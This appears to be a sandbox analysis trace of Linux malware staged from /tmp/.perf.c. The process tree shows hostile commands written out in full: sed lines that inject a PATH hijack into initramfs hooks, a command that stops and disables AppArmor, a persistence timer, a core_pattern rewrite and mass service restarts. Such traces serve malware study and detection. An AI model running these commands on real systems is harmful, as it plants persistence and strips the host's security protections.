                                                                                                                                          grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                          4⤵
                                                                                                                                            PID:2724
                                                                                                                                          • /usr/sbin/grep
                                                                                                                                            grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                            4⤵
                                                                                                                                              PID:2724
                                                                                                                                            • /usr/bin/grep
                                                                                                                                              grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                              4⤵
                                                                                                                                                PID:2724
                                                                                                                                            • /usr/bin/xargs
                                                                                                                                              xargs grep -L "export PATH=.*/\\.local/bin:.PATH"
                                                                                                                                              3⤵
                                                                                                                                                PID:2723
                                                                                                                                                • /tmp/.perf.c/grep
                                                                                                                                                  grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2727
                                                                                                                                                  • /tmp/grep
                                                                                                                                                    grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2727
                                                                                                                                                    • /usr/local/sbin/grep
                                                                                                                                                      grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2727
                                                                                                                                                      • /usr/local/bin/grep
                                                                                                                                                        grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2727
                                                                                                                                                        • /usr/sbin/grep
                                                                                                                                                          grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2727
                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                            grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2727
                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                            sed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/dhcpcd
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2728
                                                                                                                                                            • /usr/bin/sed
                                                                                                                                                              sed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                              3⤵
                                                                                                                                                                PID:2729
                                                                                                                                                            • /bin/sh
                                                                                                                                                              /bin/sh -c "systemctl --type=service --state=running|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald|awk '{print \$1}'|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"
                                                                                                                                                              2⤵
                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                              PID:2731
                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                systemctl "--type=service" "--state=running"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2733
                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                  grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2734
                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                    awk "{print \$1}"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2735
                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                      xargs "-I{}" systemctl try-restart "{}"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2737
                                                                                                                                                                        • /tmp/.perf.c/systemctl
                                                                                                                                                                          systemctl try-restart cron.service
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2869
                                                                                                                                                                          • /tmp/systemctl
                                                                                                                                                                            systemctl try-restart cron.service
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2869
                                                                                                                                                                            • /usr/local/sbin/systemctl
                                                                                                                                                                              systemctl try-restart cron.service
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2869
                                                                                                                                                                              • /usr/local/bin/systemctl
                                                                                                                                                                                systemctl try-restart cron.service
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2869
                                                                                                                                                                                • /usr/sbin/systemctl
                                                                                                                                                                                  systemctl try-restart cron.service
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2869
                                                                                                                                                                                  • /usr/bin/systemctl
                                                                                                                                                                                    systemctl try-restart cron.service
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2869
                                                                                                                                                                                    • /tmp/.perf.c/systemctl
                                                                                                                                                                                      systemctl try-restart systemd-journald.service
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3246
                                                                                                                                                                                      • /tmp/systemctl
                                                                                                                                                                                        systemctl try-restart systemd-journald.service
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3246
                                                                                                                                                                                        • /usr/local/sbin/systemctl
                                                                                                                                                                                          systemctl try-restart systemd-journald.service
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3246
                                                                                                                                                                                          • /usr/local/bin/systemctl
                                                                                                                                                                                            systemctl try-restart systemd-journald.service
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:3246
                                                                                                                                                                                            • /usr/sbin/systemctl
                                                                                                                                                                                              systemctl try-restart systemd-journald.service
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3246
                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                systemctl try-restart systemd-journald.service
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3246
                                                                                                                                                                                                • /tmp/.perf.c/systemctl
                                                                                                                                                                                                  systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3258
                                                                                                                                                                                                  • /tmp/systemctl
                                                                                                                                                                                                    systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3258
                                                                                                                                                                                                    • /usr/local/sbin/systemctl
                                                                                                                                                                                                      systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3258
                                                                                                                                                                                                      • /usr/local/bin/systemctl
                                                                                                                                                                                                        systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3258
                                                                                                                                                                                                        • /usr/sbin/systemctl
                                                                                                                                                                                                          systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:3258
                                                                                                                                                                                                          • /usr/bin/systemctl
                                                                                                                                                                                                            systemctl try-restart unattended-upgrades.service
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:3258
                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                          /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                          PID:2732
                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                          /bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                          PID:2736
                                                                                                                                                                                                          • /usr/bin/find
                                                                                                                                                                                                            find /usr/share/initramfs-tools/hooks -type f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2739
                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                              xargs grep -s -l "ldd "
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2740
                                                                                                                                                                                                                • /tmp/.perf.c/grep
                                                                                                                                                                                                                  grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2751
                                                                                                                                                                                                                  • /tmp/grep
                                                                                                                                                                                                                    grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:2751
                                                                                                                                                                                                                    • /usr/local/sbin/grep
                                                                                                                                                                                                                      grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2751
                                                                                                                                                                                                                      • /usr/local/bin/grep
                                                                                                                                                                                                                        grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:2751
                                                                                                                                                                                                                        • /usr/sbin/grep
                                                                                                                                                                                                                          grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2751
                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                            grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:2751
                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                            xargs grep -L "export PATH=.*/\\.local/bin:.PATH"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2741
                                                                                                                                                                                                                              • /tmp/.perf.c/grep
                                                                                                                                                                                                                                grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2775
                                                                                                                                                                                                                                • /tmp/grep
                                                                                                                                                                                                                                  grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:2775
                                                                                                                                                                                                                                  • /usr/local/sbin/grep
                                                                                                                                                                                                                                    grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:2775
                                                                                                                                                                                                                                    • /usr/local/bin/grep
                                                                                                                                                                                                                                      grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:2775
                                                                                                                                                                                                                                      • /usr/sbin/grep
                                                                                                                                                                                                                                        grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:2775
                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                          grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:2775
                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                        /bin/sh -c "systemctl daemon-reload;systemctl enable kmodaudit.timer;systemctl start kmodaudit.timer"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                        PID:2787
                                                                                                                                                                                                                                        • /usr/bin/systemctl
                                                                                                                                                                                                                                          systemctl daemon-reload
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2791
                                                                                                                                                                                                                                          • /usr/bin/systemctl
                                                                                                                                                                                                                                            systemctl enable kmodaudit.timer
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2993
                                                                                                                                                                                                                                            • /usr/bin/systemctl
                                                                                                                                                                                                                                              systemctl start kmodaudit.timer
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3245
                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                              /bin/sh -c "if systemctl status apparmor|grep -q 'enabled;';then systemctl stop apparmor;systemctl disable apparmor;fi"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                              PID:3242
                                                                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                                                                systemctl status apparmor
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3243
                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                  grep -q "enabled;"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3244
                                                                                                                                                                                                                                                  • /usr/bin/systemctl
                                                                                                                                                                                                                                                    systemctl stop apparmor
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3250
                                                                                                                                                                                                                                                    • /usr/bin/systemctl
                                                                                                                                                                                                                                                      systemctl disable apparmor
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Changes its process name
                                                                                                                                                                                                                                                      PID:3253
                                                                                                                                                                                                                                                      • /usr/bin/getopt
                                                                                                                                                                                                                                                        getopt -o r: --long root: -- disable apparmor
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:3255
                                                                                                                                                                                                                                                        • /usr/sbin/update-rc.d
                                                                                                                                                                                                                                                          /usr/sbin/update-rc.d apparmor defaults
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:3257
                                                                                                                                                                                                                                                            • /tmp/.perf.c/systemctl
                                                                                                                                                                                                                                                              systemctl daemon-reload
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:3259
                                                                                                                                                                                                                                                              • /tmp/systemctl
                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:3259
                                                                                                                                                                                                                                                                • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                  systemctl daemon-reload
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3259
        • /usr/local/bin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3259
        • /usr/sbin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3259
        • /usr/bin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3259
      • /usr/sbin/update-rc.d
        /usr/sbin/update-rc.d apparmor disable
        4⤵
        PID:3404
        • /tmp/.perf.c/systemctl
          systemctl daemon-reload
          5⤵
          PID:3405
        • /tmp/systemctl
          systemctl daemon-reload
          5⤵
          PID:3405
        • /usr/local/sbin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3405
        • /usr/local/bin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3405
        • /usr/sbin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3405
        • /usr/bin/systemctl
          systemctl daemon-reload
          5⤵
          PID:3405
  • /usr/bin/who
    who
    2⤵
    PID:3249
  • /bin/sh
    /bin/sh -c "who | wc -l"
    2⤵
